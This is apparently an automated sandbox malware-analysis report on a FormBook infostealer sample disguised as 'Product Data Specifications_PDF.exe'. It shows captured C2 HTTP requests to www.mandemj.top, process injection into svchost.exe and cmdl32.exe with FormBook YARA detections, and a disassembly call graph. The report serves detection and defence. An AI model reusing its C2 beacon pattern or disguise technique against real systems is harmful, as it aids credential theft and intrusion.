3k+RXxAmaDYfr/pVrtn9WEL+5qMLNphK9AntOKcMW88GraX3oqEVQmEflFQqP3lFoc66jtZJzY2TCS24A6c4JUuoX0yq4VgeVWmTK4kGAMdX5Tf4WKqAiCFdGyrbIxDXfvLApctunenwLIU1K8PwOxwEm5wVusei+5ZcBYgukxfOxST [TRUNCATED]
                            Sep 26, 2024 15:26:01.993768930 CEST533INHTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:26:01 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.749725162.0.238.43806908C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            TimestampBytes transferredDirectionData
                            Sep 26, 2024 15:26:04.526388884 CEST352OUTGET /to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ HTTP/1.1
                            Host: www.mandemj.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:26:05.119072914 CEST548INHTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:26:05 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html; charset=utf-8
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:6
                            Start time:09:22:58
                            Start date:26/09/2024
                            Path:C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
                            Imagebase:0x400000
                            File size:1'335'877 bytes
                            MD5 hash:94CC1457803DF28F1D4C7A39DB96E956
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:9
                            Start time:09:23:09
                            Start date:26/09/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
                            Imagebase:0xc20000
                            File size:46'504 bytes
                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:11:18:55
                            Start date:26/09/2024
                            Path:C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe"
                            Imagebase:0xc20000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:12
                            Start time:11:18:57
                            Start date:26/09/2024
                            Path:C:\Windows\SysWOW64\cmdl32.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\cmdl32.exe"
                            Imagebase:0x6c0000
                            File size:46'592 bytes
                            MD5 hash:BD60DF43E6419AFE39B3FCBFB14077E7
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:moderate
                            Has exited:false

                            General

                            Target ID:13
                            Start time:11:19:11
                            Start date:26/09/2024
                            Path:C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe"
                            Imagebase:0xc20000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:17
                            Start time:11:19:24
                            Start date:26/09/2024
                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                            Imagebase:0x7ff722870000
                            File size:676'768 bytes
                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:3.6%
                              Dynamic/Decrypted Code Coverage:0.4%
                              Signature Coverage:9.5%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:35
                              execution_graph 86338 4004c40 86352 4002890 86338->86352 86340 4004d38 86355 4004b30 86340->86355 86354 4002f1b 86352->86354 86358 4005d60 GetPEB 86352->86358 86354->86340 86356 4004b39 Sleep 86355->86356 86357 4004b47 86356->86357 86358->86354 86359 4010e0 86362 401100 86359->86362 86361 4010f8 86363 401113 86362->86363 86364 401184 86363->86364 86365 40114c 86363->86365 86367 401120 86363->86367 86394 401182 86363->86394 86400 401250 86364->86400 86368 401151 86365->86368 86369 40119d 86365->86369 86366 40112c DefWindowProcW 86366->86361 86367->86366 86421 401000 Shell_NotifyIconW _memcpy_s 86367->86421 86371 401219 86368->86371 86372 40115d 86368->86372 86373 42afb4 86369->86373 86379 4011a3 86369->86379 86371->86367 86376 401225 86371->86376 86374 401163 86372->86374 86375 42b01d 86372->86375 86416 40f190 10 API calls 86373->86416 86380 42afe9 86374->86380 86381 40116c 86374->86381 86375->86366 86420 4370f4 52 API calls 86375->86420 86432 468b0e 74 API calls _memcpy_s 86376->86432 86379->86367 86384 4011b6 KillTimer 86379->86384 86385 4011db SetTimer RegisterWindowMessageW 86379->86385 86418 40f190 10 API calls 86380->86418 86381->86367 86389 401174 86381->86389 86382 401193 86382->86361 86383 42b04f 86422 40e0c0 86383->86422 86415 401000 Shell_NotifyIconW _memcpy_s 86384->86415 86385->86382 86387 401204 CreatePopupMenu 86385->86387 86387->86361 86417 45fd57 65 API calls _memcpy_s 86389->86417 86393 4011c9 PostQuitMessage 86393->86361 86394->86366 86395 42afe4 86395->86382 86396 42b00e 86419 401a50 330 API calls 86396->86419 86399 42afdc 86399->86366 86399->86395 86401 401262 _memcpy_s 86400->86401 86402 4012e8 86400->86402 86433 401b80 86401->86433 86402->86382 86404 40128c 86405 4012d1 KillTimer SetTimer 86404->86405 86406 4012bb 86404->86406 86407 4272ec 86404->86407 86405->86402 86410 4012c5 86406->86410 86411 42733f 86406->86411 86408 4272f4 Shell_NotifyIconW 86407->86408 86409 42731a Shell_NotifyIconW 86407->86409 86408->86405 86409->86405 86410->86405 86412 427393 Shell_NotifyIconW 86410->86412 86413 427348 Shell_NotifyIconW 86411->86413 86414 42736e Shell_NotifyIconW 86411->86414 86412->86405 86413->86405 86414->86405 86415->86393 86416->86382 86417->86399 86418->86396 86419->86394 86420->86394 86421->86383 86424 40e0e7 _memcpy_s 86422->86424 86423 40e142 86426 40e184 86423->86426 86531 4341e6 63 API calls __wcsicoll 86423->86531 86424->86423 86425 42729f DestroyIcon 86424->86425 86425->86423 86428 40e1a0 Shell_NotifyIconW 86426->86428 86429 4272db Shell_NotifyIconW 86426->86429 86430 401b80 54 API calls 86428->86430 86431 40e1ba 86430->86431 86431->86394 86432->86395 86434 401b9c 86433->86434 86454 401c7e 86433->86454 86455 4013c0 86434->86455 86437 42722b LoadStringW 86440 427246 86437->86440 86438 401bb9 86460 402160 86438->86460 86474 40e0a0 86440->86474 86441 401bcd 86443 427258 86441->86443 86444 401bda 86441->86444 86478 40d200 52 API calls 2 library calls 86443->86478 86444->86440 86446 401be4 86444->86446 86445 401bf3 _memcpy_s _wcscpy _wcsncpy 86453 401c62 Shell_NotifyIconW 86445->86453 86473 40d200 52 API calls 2 library calls 86446->86473 86449 427267 86449->86445 86450 42727b 86449->86450 86479 40d200 52 API calls 2 library calls 86450->86479 86452 427289 86453->86454 86454->86404 86480 4115d7 86455->86480 86461 426daa 86460->86461 86462 40216b _wcslen 86460->86462 86518 40c600 86461->86518 86465 402180 86462->86465 86466 40219e 86462->86466 86464 426db5 86464->86441 86517 403bd0 52 API calls moneypunct 86465->86517 86467 4013a0 52 API calls 86466->86467 86470 4021a5 86467->86470 86469 426db7 86470->86469 86472 4115d7 52 API calls 86470->86472 86471 402187 _memmove 86471->86441 86472->86471 86473->86445 86475 40e0b2 86474->86475 86476 40e0a8 86474->86476 86475->86445 86530 403c30 52 API calls _memmove 86476->86530 86478->86449 86479->86452 86482 4115e1 _malloc 86480->86482 86483 4013e4 86482->86483 86484 4115fd std::exception::exception 86482->86484 86494 4135bb 86482->86494 86491 4013a0 86483->86491 86490 41163b 86484->86490 86508 41130a 51 API calls __cinit 86484->86508 86486 411645 86510 418105 RaiseException 86486->86510 86489 411656 86509 4180af 46 API calls std::exception::operator= 86490->86509 86492 4115d7 52 API calls 86491->86492 86493 4013a7 86492->86493 86493->86437 86493->86438 86495 413638 _malloc 86494->86495 86503 4135c9 _malloc 86494->86503 86516 417f77 46 API calls __getptd_noexit 86495->86516 86498 4135f7 RtlAllocateHeap 86498->86503 86507 413630 86498->86507 86500 413624 86514 417f77 46 API calls __getptd_noexit 86500->86514 86503->86498 86503->86500 86504 413622 86503->86504 86505 4135d4 86503->86505 86515 417f77 46 API calls __getptd_noexit 86504->86515 86505->86503 86511 418901 46 API calls 2 library calls 86505->86511 86512 418752 46 API calls 9 library calls 86505->86512 86513 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86505->86513 86507->86482 86508->86490 86509->86486 86510->86489 86511->86505 86512->86505 86514->86504 86515->86507 86516->86507 86517->86471 86519 40c619 86518->86519 86520 40c60a 86518->86520 86519->86464 86520->86519 86523 4026f0 86520->86523 86522 426d7a _memmove 86522->86464 86524 426873 86523->86524 86525 4026ff 86523->86525 86526 4013a0 52 API calls 86524->86526 86525->86522 86527 42687b 86526->86527 86528 4115d7 52 API calls 86527->86528 86529 42689e _memmove 86528->86529 86529->86522 86530->86475 86531->86426 86532 40bd20 86533 428194 86532->86533 86534 40bd2d 86532->86534 86535 40bd43 86533->86535 86537 4281bc 86533->86537 86539 4281b2 86533->86539 86536 40bd37 86534->86536 86555 4531b1 85 API calls 5 library calls 86534->86555 86544 40bd50 86536->86544 86554 45e987 86 API calls moneypunct 86537->86554 86553 40b510 VariantClear 86539->86553 86543 4281ba 86545 426cf1 86544->86545 86546 40bd63 86544->86546 86565 44cde9 52 API calls _memmove 86545->86565 86556 40bd80 86546->86556 86549 40bd73 86549->86535 86550 426cfc 86551 40e0a0 52 API calls 86550->86551 86552 426d02 86551->86552 86553->86543 86554->86534 86555->86536 86557 40bd8e 86556->86557 86561 40bdb7 _memmove 86556->86561 86558 40bded 86557->86558 86559 40bdad 86557->86559 86557->86561 86562 4115d7 52 API calls 86558->86562 86566 402f00 86559->86566 86561->86549 86563 40bdf6 86562->86563 86563->86561 86564 4115d7 52 API calls 86563->86564 86564->86561 86565->86550 86567 402f0c 86566->86567 86569 402f10 86566->86569 86567->86561 86568 4268c3 86569->86568 86570 4115d7 52 API calls 86569->86570 86571 402f51 moneypunct _memmove 86570->86571 86571->86561 86572 425ba2 86577 40e360 86572->86577 86574 425bb4 86593 41130a 51 API calls __cinit 86574->86593 86576 425bbe 86578 4115d7 52 API calls 86577->86578 86579 40e3ec GetModuleFileNameW 86578->86579 86594 413a0e 86579->86594 86581 40e421 _wcsncat 86597 413a9e 86581->86597 86584 4115d7 52 API calls 86585 40e45e _wcscpy 86584->86585 86600 40bc70 86585->86600 86589 40e4a9 86589->86574 86590 401c90 52 API calls 86592 40e4a1 _wcscat _wcslen _wcsncpy 86590->86592 86591 4115d7 52 API calls 86591->86592 86592->86589 86592->86590 86592->86591 86593->86576 86619 413801 86594->86619 86649 419efd 86597->86649 86601 4115d7 52 API calls 86600->86601 86602 40bc98 86601->86602 86603 4115d7 52 API calls 86602->86603 86604 40bca6 86603->86604 86605 40e4c0 86604->86605 86661 403350 86605->86661 86607 40e4cb RegOpenKeyExW 86608 427190 RegQueryValueExW 86607->86608 86609 40e4eb 86607->86609 86610 4271b0 86608->86610 86611 42721a RegCloseKey 86608->86611 86609->86592 86612 4115d7 52 API calls 86610->86612 86611->86592 86613 4271cb 86612->86613 86668 43652f 52 API calls 86613->86668 86615 4271d8 RegQueryValueExW 86616 42720e 86615->86616 86617 4271f7 86615->86617 86616->86611 86618 402160 52 API calls 86617->86618 86618->86616 86620 41389e 86619->86620 86627 41381a 86619->86627 86621 4139e8 86620->86621 86623 413a00 86620->86623 86646 417f77 46 API calls __getptd_noexit 86621->86646 86648 417f77 46 API calls __getptd_noexit 86623->86648 86624 4139ed 86647 417f25 10 API calls __wsplitpath_helper 86624->86647 86626 413967 86626->86581 86627->86620 86636 41388a 86627->86636 86641 419e30 46 API calls __wsplitpath_helper 86627->86641 86630 41396c 86630->86620 86630->86626 86632 41397a 86630->86632 86631 413929 86631->86620 86633 413945 86631->86633 86643 419e30 46 API calls __wsplitpath_helper 86631->86643 86645 419e30 46 API calls __wsplitpath_helper 86632->86645 86633->86620 86633->86626 86638 41395b 86633->86638 86635 413909 86635->86630 86635->86631 86636->86620 86636->86635 86642 419e30 46 API calls __wsplitpath_helper 86636->86642 86644 419e30 46 API calls __wsplitpath_helper 86638->86644 86641->86636 86642->86635 86643->86633 86644->86626 86645->86626 86646->86624 86647->86626 86648->86626 86650 419f13 86649->86650 86651 419f0e 86649->86651 86658 417f77 46 API calls __getptd_noexit 86650->86658 86651->86650 86654 419f2b 86651->86654 86653 419f18 86659 417f25 10 API calls __wsplitpath_helper 86653->86659 86657 40e454 86654->86657 86660 417f77 46 API calls __getptd_noexit 86654->86660 86657->86584 86658->86653 86659->86657 86660->86653 86662 403367 86661->86662 86663 403358 86661->86663 86664 4115d7 52 API calls 86662->86664 86663->86607 86665 403370 86664->86665 86666 4115d7 52 API calls 86665->86666 86667 40339e 86666->86667 86667->86607 86668->86615 86669 416454 86706 416c70 86669->86706 86671 416460 GetStartupInfoW 86672 416474 86671->86672 86707 419d5a HeapCreate 86672->86707 86674 4164cd 86675 4164d8 86674->86675 86791 41642b 46 API calls 3 library calls 86674->86791 86708 417c20 GetModuleHandleW 86675->86708 86678 4164de 86679 4164e9 __RTC_Initialize 86678->86679 86792 41642b 46 API calls 3 library calls 86678->86792 86727 41aaa1 GetStartupInfoW 86679->86727 86683 416503 GetCommandLineW 86740 41f584 GetEnvironmentStringsW 86683->86740 86687 416513 86746 41f4d6 GetModuleFileNameW 86687->86746 86689 41651d 86690 416528 86689->86690 86794 411924 46 API calls 3 library calls 86689->86794 86750 41f2a4 86690->86750 86693 41652e 86694 416539 86693->86694 86795 411924 46 API calls 3 library calls 86693->86795 86764 411703 86694->86764 86697 416541 86699 41654c __wwincmdln 86697->86699 86796 411924 46 API calls 3 library calls 86697->86796 86768 40d6b0 86699->86768 86702 41657c 86798 411906 46 API calls _doexit 86702->86798 86705 416581 __tsopen_nolock 86706->86671 86707->86674 86709 417c34 86708->86709 86710 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86708->86710 86799 4178ff 49 API calls _free 86709->86799 86714 417c87 TlsAlloc 86710->86714 86712 417c39 86712->86678 86715 417cd5 TlsSetValue 86714->86715 86716 417d96 86714->86716 86715->86716 86717 417ce6 __init_pointers 86715->86717 86716->86678 86800 418151 InitializeCriticalSectionAndSpinCount 86717->86800 86719 417d91 86808 4178ff 49 API calls _free 86719->86808 86721 417d2a 86721->86719 86801 416b49 86721->86801 86724 417d76 86807 41793c 46 API calls 4 library calls 86724->86807 86726 417d7e GetCurrentThreadId 86726->86716 86728 416b49 __calloc_crt 46 API calls 86727->86728 86737 41aabf 86728->86737 86729 41ac6a GetStdHandle 86734 41ac34 86729->86734 86730 416b49 __calloc_crt 46 API calls 86730->86737 86731 41acce SetHandleCount 86739 4164f7 86731->86739 86732 41ac7c GetFileType 86732->86734 86733 41abb4 86733->86734 86735 41abe0 GetFileType 86733->86735 86736 41abeb InitializeCriticalSectionAndSpinCount 86733->86736 86734->86729 86734->86731 86734->86732 86738 41aca2 InitializeCriticalSectionAndSpinCount 86734->86738 86735->86733 86735->86736 86736->86733 86736->86739 86737->86730 86737->86733 86737->86734 86737->86739 86738->86734 86738->86739 86739->86683 86793 411924 46 API calls 3 library calls 86739->86793 86741 41f595 86740->86741 86742 41f599 86740->86742 86741->86687 86818 416b04 86742->86818 86744 41f5bb _memmove 86745 41f5c2 FreeEnvironmentStringsW 86744->86745 86745->86687 86747 41f50b _wparse_cmdline 86746->86747 86748 416b04 __malloc_crt 46 API calls 86747->86748 86749 41f54e _wparse_cmdline 86747->86749 86748->86749 86749->86689 86751 41f2bc _wcslen 86750->86751 86755 41f2b4 86750->86755 86752 416b49 __calloc_crt 46 API calls 86751->86752 86757 41f2e0 _wcslen 86752->86757 86753 41f336 86825 413748 86753->86825 86755->86693 86756 416b49 __calloc_crt 46 API calls 86756->86757 86757->86753 86757->86755 86757->86756 86758 41f35c 86757->86758 86761 41f373 86757->86761 86824 41ef12 46 API calls __wsplitpath_helper 86757->86824 86759 413748 _free 46 API calls 86758->86759 86759->86755 86831 417ed3 86761->86831 86763 41f37f 86763->86693 86765 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86764->86765 86767 411750 __IsNonwritableInCurrentImage 86765->86767 86850 41130a 51 API calls __cinit 86765->86850 86767->86697 86769 42e2f3 86768->86769 86770 40d6cc 86768->86770 86851 408f40 86770->86851 86772 40d707 86855 40ebb0 86772->86855 86775 40d737 86858 411951 86775->86858 86780 40d751 86870 40f4e0 SystemParametersInfoW SystemParametersInfoW 86780->86870 86782 40d75f 86871 40d590 GetCurrentDirectoryW 86782->86871 86784 40d767 SystemParametersInfoW 86785 40d794 86784->86785 86786 40d78d FreeLibrary 86784->86786 86787 408f40 VariantClear 86785->86787 86786->86785 86788 40d79d 86787->86788 86789 408f40 VariantClear 86788->86789 86790 40d7a6 86789->86790 86790->86702 86797 4118da 46 API calls _doexit 86790->86797 86791->86675 86792->86679 86797->86702 86798->86705 86799->86712 86800->86721 86803 416b52 86801->86803 86804 416b8f 86803->86804 86805 416b70 Sleep 86803->86805 86809 41f677 86803->86809 86804->86719 86804->86724 86806 416b85 86805->86806 86806->86803 86806->86804 86807->86726 86808->86716 86810 41f683 86809->86810 86811 41f69e _malloc 86809->86811 86810->86811 86812 41f68f 86810->86812 86814 41f6b1 HeapAlloc 86811->86814 86816 41f6d8 86811->86816 86817 417f77 46 API calls __getptd_noexit 86812->86817 86814->86811 86814->86816 86815 41f694 86815->86803 86816->86803 86817->86815 86821 416b0d 86818->86821 86819 4135bb _malloc 45 API calls 86819->86821 86820 416b43 86820->86744 86821->86819 86821->86820 86822 416b24 Sleep 86821->86822 86823 416b39 86822->86823 86823->86820 86823->86821 86824->86757 86826 413753 RtlFreeHeap 86825->86826 86830 41377c __dosmaperr 86825->86830 86827 413768 86826->86827 86826->86830 86834 417f77 46 API calls __getptd_noexit 86827->86834 86829 41376e GetLastError 86829->86830 86830->86755 86835 417daa 86831->86835 86834->86829 86836 417dc9 _memcpy_s __call_reportfault 86835->86836 86837 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86836->86837 86839 417eb5 __call_reportfault 86837->86839 86841 41a208 86839->86841 86840 417ed1 GetCurrentProcess TerminateProcess 86840->86763 86842 41a210 86841->86842 86843 41a212 IsDebuggerPresent 86841->86843 86842->86840 86849 41fe19 86843->86849 86846 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86847 421ff0 __call_reportfault 86846->86847 86848 421ff8 GetCurrentProcess TerminateProcess 86846->86848 86847->86848 86848->86840 86849->86846 86850->86767 86852 408f48 moneypunct 86851->86852 86853 4265c7 VariantClear 86852->86853 86854 408f55 moneypunct 86852->86854 86853->86854 86854->86772 86911 40ebd0 86855->86911 86915 4182cb 86858->86915 86860 41195e 86922 4181f2 LeaveCriticalSection 86860->86922 86862 40d748 86863 4119b0 86862->86863 86864 4119d6 86863->86864 86865 4119bc 86863->86865 86864->86780 86865->86864 86957 417f77 46 API calls __getptd_noexit 86865->86957 86867 4119c6 86958 417f25 10 API calls __wsplitpath_helper 86867->86958 86869 4119d1 86869->86780 86870->86782 86959 401f20 86871->86959 86873 40d5b6 IsDebuggerPresent 86874 40d5c4 86873->86874 86875 42e1bb MessageBoxA 86873->86875 86876 42e1d4 86874->86876 86877 40d5e3 86874->86877 86875->86876 87131 403a50 52 API calls 3 library calls 86876->87131 87029 40f520 86877->87029 86881 40d5fd GetFullPathNameW 87041 401460 86881->87041 86883 40d63b 86884 40d643 86883->86884 86885 42e231 SetCurrentDirectoryW 86883->86885 86886 40d64c 86884->86886 87132 432fee 6 API calls 86884->87132 86885->86884 87056 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86886->87056 86889 42e252 86889->86886 86891 42e25a GetModuleFileNameW 86889->86891 86893 42e274 86891->86893 86894 42e2cb GetForegroundWindow ShellExecuteW 86891->86894 87133 401b10 86893->87133 86897 40d688 86894->86897 86895 40d656 86896 40d669 86895->86896 86899 40e0c0 74 API calls 86895->86899 87064 4091e0 86896->87064 86903 40d692 SetCurrentDirectoryW 86897->86903 86899->86896 86903->86784 86905 42e28d 87140 40d200 52 API calls 2 library calls 86905->87140 86908 42e299 GetForegroundWindow ShellExecuteW 86909 42e2c6 86908->86909 86909->86897 86910 40ec00 LoadLibraryA GetProcAddress 86910->86775 86912 40d72e 86911->86912 86913 40ebd6 LoadLibraryA 86911->86913 86912->86775 86912->86910 86913->86912 86914 40ebe7 GetProcAddress 86913->86914 86914->86912 86916 4182e0 86915->86916 86917 4182f3 EnterCriticalSection 86915->86917 86923 418209 86916->86923 86917->86860 86919 4182e6 86919->86917 86950 411924 46 API calls 3 library calls 86919->86950 86922->86862 86924 418215 __tsopen_nolock 86923->86924 86925 418225 86924->86925 86926 41823d 86924->86926 86951 418901 46 API calls 2 library calls 86925->86951 86929 